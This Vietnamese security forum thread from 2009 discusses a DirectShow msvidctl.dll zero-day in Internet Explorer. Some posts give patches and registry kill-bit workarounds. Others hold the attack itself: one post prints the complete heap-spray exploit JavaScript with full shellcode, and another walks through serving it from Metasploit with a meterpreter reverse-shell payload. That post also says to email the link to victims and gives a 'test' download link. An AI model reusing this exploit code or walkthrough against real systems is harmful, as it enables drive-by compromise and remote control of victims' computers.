banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits 0-day in Microsoft DirectShow  XML
  [Announcement]   0-day in Microsoft DirectShow 07/07/2009 20:08:32 (+0700) | #1 | 185648
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Theo http://isc.sans.org/diary.html?storyid=6733&rss cảnh báo, msvidctl.dll được sử dụng để làm bàn đạp để tấn công. Theo đánh giá của trang http://www.csis.dk/dk/nyheder/nyheder.asp?tekstID=799 (trang nguyên thủy disclose thông tin này) thì exploit này cho phép kiểm soát máy của nạn nhân từ xa.

Sans cho biết:
A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites. 


(Theo CSIS, một 0-day exploit được tìm thấy trong msvidctl.dll của DirectShow đang được khai thác xuyên qua phương tiện sử dụng hàng ngàn web site đã bị khống chế gần đây. code exploit đã được công bố rộng rãi xuyên qua một số trang web của Trung Quốc).


Đoạn code exploit được csis công bố:

Code:
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805
%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
" + [SNIP] (đoạn shell code hoàn chỉnh đã được tháo bỏ vì lý do bảo mật).

var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=sh uishiMVP+sh uishiMVP+bZmybr; memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';


Trước mắt, CSIS đưa ra biện pháp "work around":
Code:
A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400


Cho đến nay, Microsoft vẫn chưa công bố bản vá nhưng họ đang làm việc khẩn cấp để fix lổ hổng này. Đây là Advisory chính thức của MS: http://www.microsoft.com/technet/security/advisory/972890.mspx

Thông tin này cũng được thông báo rộng rãi trên một số nhật báo ở Úc: http://www.theage.com.au/technology/security/security-hole-microsoft-issues-rare-warning-20090707-dapa.html http://www.smh.com.au/technology/security/security-hole-microsoft-issues-rare-warning-20090707-dapa.html)

Cách tốt nhất hiện nay: không dùng Internet Explorer.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 07/07/2009 22:53:55 (+0700) | #2 | 185667
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]
http://go.microsoft.com/?linkid=9672398 đã có bản fix tại đây
[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 08/07/2009 04:17:53 (+0700) | #3 | 185711
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Lỗi này là IE 0-day exploit. Chỉ có tác dụng với IE vì nó thuộc về ActiveX của DirectShow, bác nào sử dụng Firefox thì vẫn an toàn không cần update. Cái nội dung file reg được công bố trên sans để disable ActiveX bị sai format:
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 09/07/2009 06:03:34 (+0700) | #4 | 185808
[Avatar]
holiganvn
Member

[Minus]    0    [Plus]
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
[Profile] [PM]
đây là đoạn sh3llode hoàn chỉnh

Code:
var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +

             "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +

             "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +

             "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +

             "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +

             "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +

             "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +

             "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +

             "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +

             "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +

             "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +

             "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +

             "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +

             "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +

             "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +

             "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +

             "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +

             "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +

             "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +

             "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +

             "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +

             "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +

             "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +

             "%u314e%u7475%u7038%u7765%u4370");var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0x30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr; memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement('object');

DivID.appendChild(myObject);

myObject.width='1';

myObject.height='1';

myObject.data='./logo.gif';

myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Thử nghiệm thành công trên nền tảng sau đây (đầy đủ patched 06/07/09):

- Trình duyệt Internet Explorer 6, Windows XP SP2
- Trình duyệt Internet Explorer 7, Windows XP SP3

đây là đoạn 2 đoạn Ruby script được xây dựng để kích hoạt lỗi:

http://www.rec-sec.com/exploits/msf/msvidctl_mpeg2.rb

http://www.rec-sec.com/code/msvidctl_gif.rb

download ruby : http://www.ruby-lang.org/en/

update bản metasploit mới nhất về để hack


ai dùng linux thì vào thư mục của metasploit rồi gõ lệnh : svn update ,để update những gì mới nhất trong kho của metasploit


hường dẫn sử dụng metasploit:

Code:
http://thegioimang.org/forum/tham-nhap-trong-microsoft/1515-tam-quan-trong-cua-update-metasploit-attack.html


HaCk t0 LeArN,N0t LeArN t0 HaCk
[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 14/07/2009 06:06:42 (+0700) | #5 | 186208
[Avatar]
holiganvn
Member

[Minus]    0    [Plus]
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
[Profile] [PM]
hướng dẫn khai thác 0-day in Microsoft DirectShow với metasploit:

em bắt đầu bằng cách chạy msfconsole sau khi Metasploit đã cập nhật phiên bản mới nhất:

Code:
holiganvn@root:~/svn/msf3-dev$ sudo ./msfconsole 

[sudo] password for holiganvn: 

        |          |   _) |  

 __ `__ \  _ \ __| _` | __| __ \ | _ \ | __| 

 |  |  | __/ |  (  |\__ \ |  | | (  | | |  

_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 

               _|          

    =[ msf v3.3-dev

+ -- --=[ 384 exploits - 261 payloads

+ -- --=[ 20 encoders - 7 nops

    =[ 166 aux

msf >em nạp mô-đun khai thác:


Code:
msf > use exploit/windows/browser/msvidctl_mpeg2 

msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp 

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(msvidctl_mpeg2) > show options

Module options:

  Name   Current Setting Required Description                     

  ----   --------------- -------- -----------                     

  SRVHOST 0.0.0.0     yes    The local host to listen on.             

  SRVPORT 8080       yes    The local port to listen on.             

  SSL   false      no    Use SSL                       

  URIPATH          no    The URI to use for this exploit (default is random) 

Payload options (windows/meterpreter/reverse_tcp):

  Name   Current Setting Required Description              

  ----   --------------- -------- -----------              

  EXITFUNC process     yes    Exit technique: seh, thread, process 

  LHOST           yes    The local address           

  LPORT   4444       yes    The local port            

Exploit target:

  Id Name                    

  -- ----                    

  0  Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0em thiết lập các biến Payload và Khai thác mô-đun:

Code:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80

SRVPORT => 80

msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158

LHOST => 192.168.1.158

msf exploit(msvidctl_mpeg2) > set URIPATH secure.html

URIPATH => secure.html

msf exploit(msvidctl_mpeg2) > exploit

[*] Exploit running as background job.

msf exploit(msvidctl_mpeg2) > 

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Using url: http://0.0.0.0:80/secure.html

[*] Local IP: http://192.168.1.158:80/secure.html

[*] Server started.Bây giờ chúng ta có thể khai thác bug ở một tệp HTML với GIF để khai thác một mục tiêu. Bạn có thể gửi các liên kết đến một mục tiêu người sử dụng trong một thư điện tử hoặc thông qua bất cứ phương pháp khác và một khi người dùng nhấn vào liên kết và mở Internet Explorer,như vậy chúng ta đã có thể khai thác vào máy của victim:

link test:

Code:
http://fb.coru.in/0msvidctl.zip
HaCk t0 LeArN,N0t LeArN t0 HaCk
[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 15/07/2009 00:18:04 (+0700) | #6 | 186244
[Avatar]
Bướm Đêm
Member

[Minus]    0    [Plus]
Joined: 25/03/2008 18:30:01
Messages: 223
Location: Phố Hoa
Offline
[Profile] [PM]
up :
13mb FULL framework: https://metasploit.com/framework-3.3-dev.exe
5mb MINI (just msfconsole): https://metasploit.com/mini-3.3-dev.exe
http://metasploit.com/svn/framework3/trunk/
GZ tqf zìeq ˘ऐ xखc sड़e cav xন qrqr
[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 15/07/2009 05:43:52 (+0700) | #7 | 186292
[Avatar]
holiganvn
Member

[Minus]    0    [Plus]
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
[Profile] [PM]
trong *nix thì các bác dùng lệnh dưới để cập nhật cho metasploit :

Code:
svn updateHaCk t0 LeArN,N0t LeArN t0 HaCk
[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 15/07/2009 07:06:45 (+0700) | #8 | 186298
[Avatar]
winwinwin
Member

[Minus]    0    [Plus]
Joined: 11/05/2009 21:07:31
Messages: 29
Offline
[Profile] [PM]
bản vá lỗi tại đây http://go.microsoft.com/?linkid=9672398
Thiết lập kill bit trong registry để ngăn chặn Internet Explorer tiếp xúc với thành phần COM nguy hiểm tại đây
http://blog.bkis.com/wp-content/uploads/2009/07/killbitdirectshow.reg smilie smilie
Theo bkis.
[Up] [Print Copy]
  [Announcement]   0-day in Microsoft DirectShow 13/08/2009 16:23:30 (+0700) | #9 | 189848
[Avatar]
holiganvn
Member

[Minus]    0    [Plus]
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
[Profile] [PM]
Metasploit 3.3-dev for win32:

/hvaonline/posts/list/29873.html#184276


bản metasploit v3.3 cho linux:

http://www.telesphoreo.org/browser/trunk/data/metasploit3/framework-3.3.tar.gz


HaCk t0 LeArN,N0t LeArN t0 HaCk
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|